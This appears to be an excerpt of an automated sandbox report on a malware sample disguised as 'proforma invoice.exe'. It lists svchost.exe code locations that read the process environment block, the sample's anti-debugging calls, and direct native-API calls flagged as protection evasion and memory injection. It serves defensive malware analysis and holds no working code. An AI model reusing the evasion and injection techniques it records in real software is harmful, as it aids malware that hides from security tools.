            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]1_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]1_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]1_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]1_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]1_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]1_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03242840 mov ecx, dword ptr fs:[00000030h]1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260854 mov eax, dword ptr fs:[00000030h]1_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230887 mov eax, dword ptr fs:[00000030h]1_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC89D mov eax, dword ptr fs:[00000030h]1_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA8E4 mov eax, dword ptr fs:[00000030h]1_2_032FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C8F9 mov eax, dword ptr fs:[00000030h]1_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C8F9 mov eax, dword ptr fs:[00000030h]1_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E8C0 mov eax, dword ptr fs:[00000030h]1_2_0325E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EF28 mov eax, dword ptr fs:[00000030h]1_2_0325EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E6F00 mov eax, dword ptr fs:[00000030h]1_2_032E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232F12 mov eax, dword ptr fs:[00000030h]1_2_03232F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CF1F mov eax, dword ptr fs:[00000030h]1_2_0326CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325AF69 mov eax, dword ptr fs:[00000030h]1_2_0325AF69
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC083F
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC09D5 SetUnhandledExceptionFilter,0_2_00AC09D5
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC0C21

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQueryInformationToken: Direct from: 0x76F02CAC
